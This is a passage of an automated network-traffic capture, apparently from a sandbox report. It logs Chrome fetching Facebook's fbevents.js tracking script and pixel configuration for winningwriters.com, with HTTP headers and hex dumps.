                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 2a 1e 53 8e 1b e7 0e 00 00 fb a4 4a 7f 6c 77 2d 69 64 ea 42 7c 91 c5 1d 00 80 25 fc 8d d7 13 ec b2 75 ad 43 bb d0 3c de 13 3f 00 00 58 32 75 7a b1 5d b6 a4 a1 6e 61 62 62 4d 57 35 af b6 a8 03 00 b0 d4 da 2a fd 91 1d b7 ae 7e 68 17 9f ea 3c 01 00 60 a9 f5 a1 79 6d 79 df db 8e 5b d2 f0 0d ed 62 dc bf ab d2 9b 2d e6 00 00 2c a3 17 da 79 eb ca b5 21 bd c0 b9 01 00 c0 f2 0d ef d2 5f 97 f7 bf ed bc 25 0d d7 d0 2e 34 27 5b c4 01 00 58 f6 4f de 85 74 92 1d b8 ae 30 b4 3b c9 79 01 00 c0 f2 6b 4e 36 bc 93 34 2c 43 bb 83 f2 cd f2 87 2d dc 00 00 ac d8 6f bc d6 e9 75 1e 57 33 e6 f7 21 1e d3 0f 00 c0 ca fb 58 79 3f dc 6e 5c d2 40 0f ed ca 62 65 c1 06 00 60 15 bc c1 f0 6e 8c 87 76 f9 f5 77 0e 00 00 b0 f2 e2 df 6c 59 b7 ee 10 bb 72 49 03 57 59 9c ba 2a 7d c1 42 0d 00 c0
                                                                                                                                                                                            Data Ascii: *SJlw-idB|%uC<?X2uz]nabbMW5*~h<`ymy[b-,y!_%.4'[XOt0;ykN64,C-ouW3!Xy?n\@be`nvwlYrIWY*}B
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: f4 cc 2f 14 77 00 00 00 00 00 00 d0 7b 37 2a ee 00 00 00 00 00 00 40 71 07 00 00 00 00 00 00 dc b7 b8 9b 33 0c 00 00 00 00 00 00 e8 79 71 57 5e 63 18 00 00 00 00 00 00 d0 33 4d c5 1d 00 00 00 00 00 00 f4 5c 79 cd fe e2 ee 6a c3 00 00 00 00 00 00 80 de a8 43 da b5 af b8 2b d2 95 06 02 00 00 00 00 00 00 3d 52 a4 2b f7 16 77 55 48 97 18 08 00 00 00 00 00 00 f4 4a bc fc de 57 65 a6 8b 0d 03 00 00 00 00 00 00 7a e6 e2 fd c5 dd 85 86 01 00 00 00 00 00 00 3d 92 a7 2f ef 7f 55 e6 05 06 02 00 00 00 00 00 00 bd 2a ee e2 17 f6 17 77 e7 1b 08 00 00 00 00 00 00 f4 48 91 3e b6 ff 55 99 7f 69 20 00 00 00 00 00 00 d0 1b 75 51 fe f5 de e2 ae 0e e5 79 06 02 00 00 00 00 00 00 3d 2a ee 42 79 de be 57 65 e6 e9 6d 06 02 00 00 00 00 00 00 3d f3 ae 7d af ca 2c d2 9b 0d 03 00 00
                                                                                                                                                                                            Data Ascii: /w{7*@q3yqW^c3M\yjC+=R+wUHJWez=/U*wH>Ui uQy=*ByWem=},
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 64 b4 03 c0 78 27 49 92 24 49 92 24 49 46 3b 00 30 de 49 92 24 49 92 24 49 92 d1 0e 00 e3 9d 24 49 92 24 49 92 24 19 ed 00 c0 78 27 49 92 24 49 92 24 49 46 3b 00 8c 77 92 24 49 92 24 49 92 64 b4 03 00 e3 9d 24 49 92 24 49 92 24 19 ed 00 30 de 49 92 24 49 92 24 49 92 d1 0e 00 8c 77 92 24 49 92 24 49 92 d4 7d e6 d5 17 00 e3 9d 24 49 92 24 49 92 24 15 6c 7e e7 f4 da 0b 80 f1 4e 92 24 49 92 24 49 92 8c 76 00 60 bc 93 24 49 92 24 49 92 64 b4 03 00 e3 9d 24 49 92 24 49 92 24 19 ed 00 c0 78 27 49 92 24 49 92 24 c9 68 07 00 c6 3b 49 92 24 49 92 24 49 32 da 01 80 f1 4e 92 24 49 92 24 49 92 d1 0e 00 8c 77 92 24 49 92 24 49 92 64 b4 03 00 e3 9d 24 49 92 24 49 92 24 a3 1d 00 18 ef 24 49 92 24 49 92 24 c9 68 07 00 c6 3b 49 92 24 49 92 24 49 46 3b 00 30 de 19 ef 24 49
                                                                                                                                                                                            Data Ascii: dx'I$I$IF;0I$I$I$I$I$x'I$I$IF;w$I$Id$I$I$0I$I$Iw$I$I}$I$I$l~N$I$Iv`$I$Id$I$I$x'I$I$h;I$I$I2N$I$Iw$I$Id$I$I$$I$I$h;I$I$IF;0$I
                                                                                                                                                                                            2024-11-18 20:00:08 UTC750INData Raw: 00 00 10 21 de 89 76 00 00 00 00 00 00 44 88 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68 07 00 00 00 00 00 40 84 78 37 cb fd 22 da 01 00 00 00 00 00 2c 90 78 37 ab fd fa c7 e6 f9 e7 fe b5 00 00 00 00 00 00 0b 25 de 89 76 00 00 00 00 00 00 44 8c f1 ee 7c 33 1c 0b 64 a2 1d 00 00 00 00 00 00 13 1b e3 d0 18 89 84 32 d1 0e 00 00 00 00 00 80 89 89 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68 07 00 00 00 00 00 40 84 78 27 da 01 00 00 00 00 00 10 21 de 89 76 00 00 00 00 00 00 44 88 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68 07 00 00 00 00 00 40 84 78 27 da 01 00 00 00 00 00 10 21 de 89 76 00 00 00 00 00 00 44 88 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68 07 00 00 00 00 00 40 84 78 27 da 01 00 00 00 00 00 10 21 de 89 76 00 00 00 00 00 00 44 88 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68
                                                                                                                                                                                            Data Ascii: !vDwh@x7",x7%vD|3d2wh@x'!vDwh@x'!vDwh@x'!vDwh


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            48192.168.2.1649770157.240.0.64436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC361OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                            Host: connect.facebook.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                            report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                            content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-C9RY4CIf' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                            document-policy: force-load-at-top
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                            Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1INData Raw: 2f
                                                                                                                                                                                            Data Ascii: /
                                                                                                                                                                                            2024-11-18 20:00:08 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                            Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                            2024-11-18 20:00:08 UTC16384INData Raw: 7c 64 3d 3d 3d 22 47 54 4d 22 7c 7c 64 3d 3d 3d 22 4a 53 4f 4e 5f 4c 44 22 7c 7c 64 3d 3d 3d 22 4d 45 54 41 5f 54 41 47 22 7c 7c 64 3d 3d 3d 22 4f 50 45 4e 5f 47 52 41 50 48 22 7c 7c 64 3d 3d 3d 22 52 44 46 41 22 7c 7c 64 3d 3d 3d 22 53 43 48 45 4d 41 5f 44 4f 54 5f 4f 52 47 22 7c 7c 64 3d 3d 3d 22 55 52 49 22 3f 64 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 21 3d 6e 75 6c 6c 26 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e
                                                                                                                                                                                            Data Ascii: |d==="GTM"||d==="JSON_LD"||d==="META_TAG"||d==="OPEN_GRAPH"||d==="RDFA"||d==="SCHEMA_DOT_ORG"||d==="URI"?d:null;return b!=null&&c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefin
                                                                                                                                                                                            2024-11-18 20:00:08 UTC16384INData Raw: 75 72 6e 20 6a 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 78 70 65 72 69 6d 65 6e 74 73 54 79 70 65 64 65 66 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f
                                                                                                                                                                                            Data Ascii: urn j.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEventsExperimentsTypedef",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enfo
                                                                                                                                                                                            2024-11-18 20:00:08 UTC16384INData Raw: 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 42 61 73 65 45 76 65 6e 74 22 29 2c 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 69 78 65 6c 54 79 70 65 64 65 66 22 29 2c 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22
                                                                                                                                                                                            Data Ascii: r a=f.getFbeventsModules("SignalsFBEventsBaseEvent"),b=f.getFbeventsModules("SignalsFBEventsPixelTypedef"),c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1703INData Raw: 61 72 20 62 3d 67 5b 6b 28 61 29 5d 3b 62 3d 62 26 26 62 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 2e 63 61 6c 6c 26 26 62 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 28 29 3d 3d 3d 64 3f 62 3a 6e 75 6c 6c 3b 62 21 3d 3d 6e 75 6c 6c 26 26 28 6a 5b 61 5b 30 5d 5d 3d 6a 5b 61 5b 30 5d 5d 7c 7c 7b 7d 2c 6a 5b 61 5b 30 5d 5d 5b 61 5b 31 5d 5d 3d 62 29 3b 72 65 74 75 72 6e 20 62 21 3d 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                                                            Data Ascii: ar b=g[k(a)];b=b&&b.getProtocol.call&&b.getProtocol()===d?b:null;b!==null&&(j[a[0]]=j[a[0]]||{},j[a[0]][a[1]]=b);return b!==null}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function
                                                                                                                                                                                            2024-11-18 20:00:09 UTC14681INData Raw: 61 29 7b 61 3d 62 28 61 2c 63 29 3b 61 21 3d 6e 75 6c 6c 26 26 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 61 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 6e 63 6f 64 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 69 66 28 67 2e 66 62 71 3d 3d 6e 75 6c 6c 7c 7c 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75
                                                                                                                                                                                            Data Ascii: a){a=b(a,c);a!=null&&(this.moduleEncodings=a)}},{key:"addEncodings",value:function(a){var c=this;if(g.fbq==null||g.fbq.__fbeventsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==nu
                                                                                                                                                                                            2024-11-18 20:00:09 UTC16384INData Raw: 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 4c 6f 67 67 69 6e 67 22 29 2c 63 3d 62 2e 6c 6f 67 45 72 72 6f 72 3b 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 3b 76 61 72 20 64 3d 62 2e 6d 61 70 2c 65 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 2c 6a
                                                                                                                                                                                            Data Ascii: entsModules("SignalsFBEventsLogging"),c=b.logError;b=f.getFbeventsModules("SignalsFBEventsUtils");var d=b.map,e=f.getFbeventsModules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET"),j
                                                                                                                                                                                            2024-11-18 20:00:09 UTC16384INData Raw: 72 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26
                                                                                                                                                                                            Data Ascii: r")throw new g();return a}}function r(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"||Array.isArray(a)||a==null)throw new g();return a}}function s(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"&&


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            49192.168.2.1649771157.240.0.64436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1381OUTGET /signals/config/188856481728275?v=2.9.177&r=stable&domain=winningwriters.com&hme=c3e4904c1dde42d643265ef909b9e193c41cedcd6f559a3ff5e1b178e36647fa&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                            Host: connect.facebook.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                            report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                            content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-Jq5t2IUa' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                            document-policy: force-load-at-top
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                            Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                            2024-11-18 20:00:08 UTC811INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                            Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
